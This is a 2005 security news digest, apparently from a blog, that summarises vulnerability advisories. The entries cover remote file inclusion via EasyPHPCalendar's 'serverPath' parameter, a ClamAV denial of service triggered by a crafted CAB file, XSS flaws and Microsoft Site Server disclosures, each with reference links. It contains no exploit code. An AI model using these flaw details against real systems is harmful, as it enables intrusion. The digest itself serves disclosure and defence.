Network Security News – Wednesday, July 06, 2005 Events
EasyPHPCalendar header.inc.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the header.inc.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled.. Read more at osvdb.org/17732
EasyPHPCalendar datePicker.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /events/datePicker.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled.. Read more at osvdb.org/17733
EasyPHPCalendar setupSQL.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /setup/setupSQL.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled.. Read more at osvdb.org/17734
EasyPHPCalendar popup.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled.. Read more at osvdb.org/17731
EasyPHPCalendar calendar.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the calendar.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled.. Read more at osvdb.org/17723
Clam AntiVirus Zero Length Cabinet File ENSURE_BITS() Macro DoS
ClamAV contains a flaw that may allow a remote denial of service. The issue is triggered when the ENSURE_BITS() function in the libclamav/mspack/mszipd.c fails to properly validate user supplied input. A remote attacker could send a specially crafted CAB file with a cffile_FolderOffset set to 0xff to cause the program to enter an infinite loop, resulting in a loss of availability of the anti-virus system.. Read more at osvdb.org/17645
Comdev eCommerce index.php Review Field XSS
Comdev eCommerce contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input passed to the 'Add Your Review' section of the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.. Read more at osvdb.org/17675
Microsoft Site Server remind.asp Information Disclosure
Microsoft Site Server contains a flaw that may lead to an unauthorized information disclosure. Өe issue is triggered when using the 'LDAP_Anonymous' account and accessing the 'remind.asp' script, which will disclose the password reminder for any LDAP user resulting in a loss of confidentiality. While not considered critical, this information can lead to more focused and precise attacks.. Read more at osvdb.org/17664
Microsoft Site Server LDAP_Anonymous Account Plaintext Password Disclosure
Microsoft Site Server contains a flaw that may lead to an unauthorized password exposure. It is possible to gain access to plaintext passwords when using the 'LDAP_Anonymous' account, which may lead to a loss of confidentiality.. Read more at osvdb.org/17667
Microsoft Site Server cphost.dll Arbitrary Code Execution
Microsoft Site Server contains a flaw that may allow a remote attacker to execute arbitrary ASP code. The issue is due to the 'cphost.dll' not properly sanitizing user input, specifically traversal style attacks (..). By specifying a specially crafted filename disposition parameter, a remote attacker can execute arbitrary ASP code resulting in a loss of integrity.. Read more at osvdb.org/17669
Vuln: Adobe Reader For Unix Remote Buffer Overflow Vulnerability
Adobe Reader For Unix Remote Buffer Overflow Vulnerability. Read more at securityfocus.com/bid/14153
Vuln: MyGuestbook Form.Inc.PHP3 Remote File Include Vulnerability
MyGuestbook Form.Inc.PHP3 Remote File Include Vulnerability. Read more at securityfocus.com/bid/14155
Vuln: AutoIndex PHP Script Index.PHP Cross-Site Scripting Vulnerability
AutoIndex PHP Script Index.PHP Cross-Site Scripting Vulnerability
. Read more at securityfocus.com/bid/14154
Vuln: Covide Groupware-CRM Unspecified SQL Injection Vulnerability
Covide Groupware-CRM Unspecified SQL Injection Vulnerability. Read more at securityfocus.com/bid/14156
Re: [badroot security] AutoIndex PHP Script: XSS vulnerability
Re: [badroot security] AutoIndex PHP Script: XSS vulnerability. Read more at securityfocus.com/archive/1/404291
[badroot security] probe.cgi: Remote Command Execution
[badroot security] probe.cgi: Remote Command Execution. Read more at securityfocus.com/archive/1/404294
iDEFENSE Security Advisory 07.05.05: Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability
iDEFENSE Security Advisory 07.05.05: Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability
. Read more at securityfocus.com/archive/1/404289
MyGuestbook Remote File Inclusion.
MyGuestbook Remote File Inclusion.. Read more at securityfocus.com/archive/1/404297
Leave a Reply